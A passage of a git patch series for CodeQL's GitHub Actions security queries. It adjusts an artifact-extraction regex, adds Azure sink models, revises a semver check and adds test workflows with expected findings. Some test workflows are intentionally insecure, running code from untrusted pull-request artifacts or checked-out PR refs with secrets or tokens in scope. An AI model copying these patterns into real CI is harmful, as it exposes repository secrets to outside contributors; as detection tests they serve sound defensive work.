unzipDirArgRegexp() { result = "-d\\s+([^ ]+).*" } +string unzipDirArgRegexp() { result = "(-d|-C)\\s+([^ ]+).*" } abstract class UntrustedArtifactDownloadStep extends Step { abstract string getPath(); @@ -166,7 +166,7 @@ class ActionsGitHubScriptDownloadStep extends UntrustedArtifactDownloadStep, Use .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) then result = "GITHUB_WORKSPACE/" @@ -197,13 +197,13 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else if this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) or @@ -243,13 +243,13 @@ class DirectArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { result = normalizePath(trimQuotes(this.getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) or + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) or result = normalizePath(trimQuotes(this.getAFollowingStep() .(Run) .getScript() .getACommand() - .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 2))) + .regexpCapture(unzipRegexp() + unzipDirArgRegexp(), 3))) else result = "GITHUB_WORKSPACE/" } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml new file mode 100644 index 00000000000..c825cc73813 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test25.yml @@ -0,0 +1,42 @@ +on: + workflow_run: + workflows: [ "build" ] + types: [ completed ] + +defaults: + run: + shell: bash + +jobs: + publish-build-scans: + name: Build scan publish + if: github.repository == 'test/test' && github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion != 'cancelled' + runs-on: ubuntu-latest + steps: + # Checkout target branch which has trusted code + - name: Check out target branch + uses: actions/checkout@v4 + with: + persist-credentials: false + ref: ${{ github.ref }} + - name: Download build scan + id: downloadBuildScan + uses: actions/download-artifact@v4 + with: + name: build-scan + github-token: ${{ github.token }} + repository: ${{ github.repository }} + run-id: ${{ github.event.workflow_run.id }} + # Don't fail a build if the file doesn't exist + continue-on-error: true + - name: Extract previously uploaded build scan content + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + run: tar -xzf build-scan.tgz -C ~ + - name: Publish + if: ${{ steps.downloadBuildScan.outcome != 'failure'}} + # Don't fail a build if publishing fails + continue-on-error: true + run: | + ./gradlew buildScanPublishPrevious + env: + ACCESS_KEY: ${{ secrets.TEST_ACCESS_KEY }} diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index 53b14ee7b50..fd3c1fbc195 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -47,6 +48,8 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -65,3 +68,4 @@ subpaths | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | make snapshot | | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Uses Step | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | ./gradlew buildScanPublishPrevious\n | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 49cee7772c0..09aed9e34a1 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -15,6 +15,7 @@ edges | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | Config | | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | provenance | Config | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | provenance | Config | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | provenance | Config | nodes | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | @@ -47,5 +48,7 @@ nodes | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | semmle.label | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | | .github/workflows/test18.yml:12:15:33:12 | Uses Step | semmle.label | Uses Step | | .github/workflows/test18.yml:36:15:40:58 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 6b273518167..3b2e5eb9de8 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -276,6 +276,9 @@ edges | .github/workflows/test23.yml:38:9:43:6 | Uses Step | .github/workflows/test23.yml:43:9:46:16 | Run Step | | .github/workflows/test24.yml:7:9:10:6 | Uses Step | .github/workflows/test24.yml:10:9:16:6 | Run Step | | .github/workflows/test24.yml:10:9:16:6 | Run Step | .github/workflows/test24.yml:16:9:20:57 | Run Step | +| .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | +| .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From b6a26e76d4c3bece2bcee0d58c8b69cc0390be7a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:03:11 +0200 Subject: [PATCH 0623/1267] New azure models --- ql/lib/ext/manual/azure_cli.model.yml | 7 +++++++ ql/lib/ext/manual/azure_powershell.model.yml | 1 + 2 files changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/azure_cli.model.yml diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml new file mode 100644 index 00000000000..dcf1de044aa --- /dev/null +++ b/ql/lib/ext/manual/azure_cli.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"] + - ["azure/cli", "*", "input.azcliversion", "command-injection", "manual"] diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml index e050b61815e..a2d08f93928 100644 --- a/ql/lib/ext/manual/azure_powershell.model.yml +++ b/ql/lib/ext/manual/azure_powershell.model.yml @@ -3,4 +3,5 @@ extensions: pack: github/actions-all extensible: actionsSinkModel data: + - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"] - ["azure/powershell", "*", "input.azPSVersion", "command-injection", "manual"] From dbcf113546430d68a479f0766124576f46e024a0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 22:04:01 +0200 Subject: [PATCH 0624/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 1af220ff8fb..a818ba5362a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.75 +version: 0.1.76 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8098e4f215..fe6bdb0d77e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.75 +version: 0.1.76 groups: [actions, queries] suites: codeql-suites extractor: javascript From c9b1cd2c02ff6b6cebec5c8c34e296a10e768eb9 Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:16:43 -0400 Subject: [PATCH 0625/1267] add workflow to catch some ineligible wildcards and eligible latest version for immutable actions --- .../UseOfUnversionedImmutableAction.qll | 15 ++++++-- .../workflows/issue_comment_octokit2.yml | 38 +++++++++++++++++++ .../UnversionedImmutableAction.expected | 3 ++ 3 files changed, 53 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml diff --git a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll index 3f65a2ffc72..2fd47e3f8e1 100644 --- a/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll +++ b/ql/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll @@ -6,11 +6,20 @@ class UnversionedImmutableAction extends UsesStep { UnversionedImmutableAction() { immutableActionsDataModel(immutable_action) and this.getCallee() = immutable_action and - isNotSemVer(this.getVersion()) + not isSemVer(this.getVersion()) } } bindingset[version] -predicate isNotSemVer(string version) { - not version.regexpMatch("^(v)?[0-9]+(\\.[0-9]+)*(\\.[xX])?$") +predicate isSemVer(string version) { + // https://semver.org/#is-there-a-suggested-regular-expression-regex-to-check-a-semver-string with optional v prefix + version.regexpMatch("^v?(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?$") + + // or N or N.x or N.N.x with optional v prefix + or version.regexpMatch("^v?[1-9]\\d*$") + or version.regexpMatch("^v?[1-9]\\d*\\.(x|0|([1-9]\\d*))$") + or version.regexpMatch("^v?[1-9]\\d*\\.(0|([1-9]\\d*))\\.(x|0|([1-9]\\d*))$") + + // or latest which will work + or version = "latest" } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml new file mode 100644 index 00000000000..84081fef5d0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -0,0 +1,38 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR minor and patch wildcard + uses: octokit/request-action@v2.x.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor patch wildcard + - uses: actions/checkout@v2.x.xx + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor wildcard incomplete patch + uses: actions/checkout@v2.x. + - name: Run latest action + uses: some-action/some-repo@latest + with: + some-input: some-value + - name: run the latest checkout action + uses: actions/checkout@latest \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 5ae46862fb4..3aa7d6d654e 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -4,6 +4,9 @@ | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | | .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | | .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | From 1c6d346f5343b115ec70c40e0852c70be052c52b Mon Sep 17 00:00:00 2001 From: Kylie Stradley <4666485+KyFaSt@users.noreply.github.com> Date: Wed, 23 Oct 2024 21:24:12 -0400 Subject: [PATCH 0626/1267] change ql message --- .../CWE-829/UnversionedImmutableAction.ql | 2 +- .../UnversionedImmutableAction.expected | 44 +++++++++---------- 2 files changed, 23 insertions(+), 23 deletions(-) diff --git a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql index 0c6443bc3e6..0bc571ad473 100644 --- a/ql/src/Security/CWE-829/UnversionedImmutableAction.ql +++ b/ql/src/Security/CWE-829/UnversionedImmutableAction.ql @@ -15,5 +15,5 @@ import codeql.actions.security.UseOfUnversionedImmutableAction from UnversionedImmutableAction step select step, - "The workflow is using an immutable action ($@) without versinoning so it doesn't work", step, + "The workflow is using an eligible immutable action ($@) without semantic versioning", step, step.getCallee() \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected index 3aa7d6d654e..df23709b542 100644 --- a/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected +++ b/ql/test/query-tests/Security/CWE-829/UnversionedImmutableAction.expected @@ -1,22 +1,22 @@ -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | -| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | -| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | -| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | -| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | -| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | -| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | -| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | -| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | -| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | -| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | -| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | -| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | -| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | -| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an immutable action ($@) without versinoning so it doesn't work | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | actions/github-script | +| .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:17:9:18:6 | Uses Step | actions/checkout | +| .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:19:9:26:6 | Uses Step: fetch_pr | octokit/request-action | +| .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:27:9:31:6 | Uses Step | actions/checkout | +| .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/issue_comment_octokit2.yml:31:9:33:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:30:9:36:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:30:9:36:6 | Uses Step | actions/checkout | +| .github/workflows/poc.yml:36:9:38:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:36:9:38:6 | Uses Step | actions/configure-pages | +| .github/workflows/poc.yml:43:9:47:2 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:43:9:47:2 | Uses Step | actions/upload-pages-artifact | +| .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/poc.yml:59:9:63:26 | Uses Step: deployment | actions/deploy-pages | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | actions/checkout | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test8.yml:20:9:26:6 | Uses Step | actions/checkout | +| .github/workflows/test9.yml:11:9:16:6 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test9.yml:11:9:16:6 | Uses Step | actions/checkout | +| .github/workflows/test11.yml:84:7:90:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test11.yml:84:7:90:4 | Uses Step | actions/checkout | +| .github/workflows/test12.yml:86:7:92:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test12.yml:86:7:92:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:101:7:105:4 | Uses Step | actions/checkout | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test14.yml:105:7:111:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:60:7:65:4 | Uses Step | actions/checkout | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | The workflow is using an eligible immutable action ($@) without semantic versioning | .github/workflows/test15.yml:110:7:115:4 | Uses Step | actions/checkout | From 